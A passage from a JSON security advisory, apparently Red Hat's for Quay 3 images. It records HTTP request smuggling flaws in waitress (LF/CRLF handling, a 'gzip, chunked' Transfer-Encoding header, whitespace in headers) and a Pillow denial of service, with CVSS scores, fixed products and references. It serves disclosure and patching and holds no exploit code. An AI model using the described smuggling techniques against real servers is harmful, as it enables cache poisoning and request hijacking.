"Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2020-01-15T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1791420" } ], "notes": [ { "category": "description", "text": "An HTTP-request vulnerability was discovered in Waitress which implemented a \"MAY\" part of the RFC7230 which states: \"Although the line terminator for the start-line and header fields is the sequence CRLF, a recipient MAY recognize a single LF as a line terminator and ignore any preceding CR.\" Unfortunately, if a front-end server does not process header fields with an LF the same way as it processes those with a CRLF, it can lead to the front-end and the back-end server processing the same HTTP message in two different ways. 
This vulnerability can lead to a potential for HTTP request smuggling and splitting where Waitress may see two requests, while the front-end server only sees a single HTTP message.", "title": "Vulnerability description" }, { "category": "summary", "text": "waitress: HTTP request smuggling through LF vs CRLF handling", "title": "Vulnerability summary" }, { "category": "other", "text": "All affected Red Hat products ship but do not use the flawed version of python-waitress. The impact for these products is therefore rated as having a security impact of Low.\n\nIn Red Hat OpenStack Platform 13, because the flawed code is not used and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP13 python-waitress package.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", 
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2019-16785" }, { "category": "external", "summary": "RHBZ#1791420", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1791420" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2019-16785", "url": "https://www.cve.org/CVERecord?id=CVE-2019-16785" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-16785", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16785" }, { "category": "external", "summary": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id6", "url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id6" } ], "release_date": "2019-12-20T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", 
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N", "version": "3.1" }, "products": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", 
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "waitress: HTTP request smuggling through LF vs CRLF handling" }, { "cve": "CVE-2019-16786", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2020-01-15T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1791415" } ], "notes": [ { "category": "description", "text": "An HTTP-interpretation flaw was found in waitress which did not properly validate incoming HTTP headers. When parsing the Transfer-Encoding header, waitress would look only for a single string value. According to the HTTP standard, Transfer-Encoding should be a comma-separated list, with the inner-most encoding first, followed by any further transfer codings, ending with \u0027chunked\u0027. 
Because of this flaw, requests sent with: \"Transfer-Encoding: gzip, chunked\" would get ignored, and waitress would use the Content-Length header instead to determine the body size of the HTTP message. A remote attacker could exploit this flaw to force waitress to accept potentially bad HTTP requests or treat a single request as multiple requests in the case of HTTP pipelining.", "title": "Vulnerability description" }, { "category": "summary", "text": "waitress: HTTP request smuggling through invalid Transfer-Encoding", "title": "Vulnerability summary" }, { "category": "other", "text": "All affected Red Hat products ship but do not use the flawed version of python-waitress. The impact for these products is therefore rated as having a security impact of Low.\n\nIn Red Hat OpenStack Platform 13, because the flawed code is not used and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP13 python-waitress package.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", 
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2019-16786" }, { "category": "external", "summary": "RHBZ#1791415", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1791415" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2019-16786", "url": "https://www.cve.org/CVERecord?id=CVE-2019-16786" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-16786", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16786" }, { "category": "external", "summary": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id6", "url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id6" } ], "release_date": "2019-12-20T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", 
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N", "version": "3.1" }, "products": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", 
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "waitress: HTTP request smuggling through invalid Transfer-Encoding" }, { "cve": "CVE-2019-16789", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2019-12-26T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1789807" } ], "notes": [ { "category": "description", "text": "An HTTP-interpretation flaw was found in waitress, through version 1.4.0. If a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. 
Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server, an HTTP request splitting could occur which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation. The highest threat from this vulnerability is data integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "waitress: HTTP Request Smuggling through Invalid whitespace characters in headers", "title": "Vulnerability summary" }, { "category": "other", "text": "All affected Red Hat products ship but do not use the flawed version of python-waitress. The impact for these products is therefore rated as having a security impact of Low.\n\nFor Red Hat OpenStack Platform 13, because the flaw has a lower impact and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP13 python-waitress package.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", 
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2019-16789" }, { "category": "external", "summary": "RHBZ#1789807", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789807" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2019-16789", "url": "https://www.cve.org/CVERecord?id=CVE-2019-16789" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-16789", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16789" }, { "category": "external", "summary": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id2", "url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id2" } ], "release_date": "2019-12-26T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been 
applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "version": "3.1" }, "products": [ 
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "waitress: HTTP Request Smuggling through Invalid whitespace characters in headers" }, { "cve": "CVE-2019-19911", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-01-03T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1789540" } ], "notes": [ { "category": "description", "text": "A denial of service vulnerability was found in Pillow in versions before 6.2.2, where the FpxImagePlugin.py file calls the range function on an unvalidated 32-bit integer if the number of bands is 
large. On Windows systems running 32-bit Python, this flaw results in an OverflowError or MemoryError due to the 2 GB limit. On Linux systems running 64-bit Python, this flaw results in the termination of the process by the out-of-memory (OOM) killer. The highest threat from this vulnerability is to system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "python-pillow: uncontrolled resource consumption in FpxImagePlugin.py", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue did not affect the versions of python-pillow as shipped with Red Hat Enterprise Linux 7, and 8 as they did not include python-olefile, which is necessary to use the FPX image plugin.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", 
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2019-19911" }, { "category": "external", "summary": "RHBZ#1789540", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789540" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2019-19911", "url": "https://www.cve.org/CVERecord?id=CVE-2019-19911" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-19911", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-19911" } ], "release_date": "2020-01-03T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", 
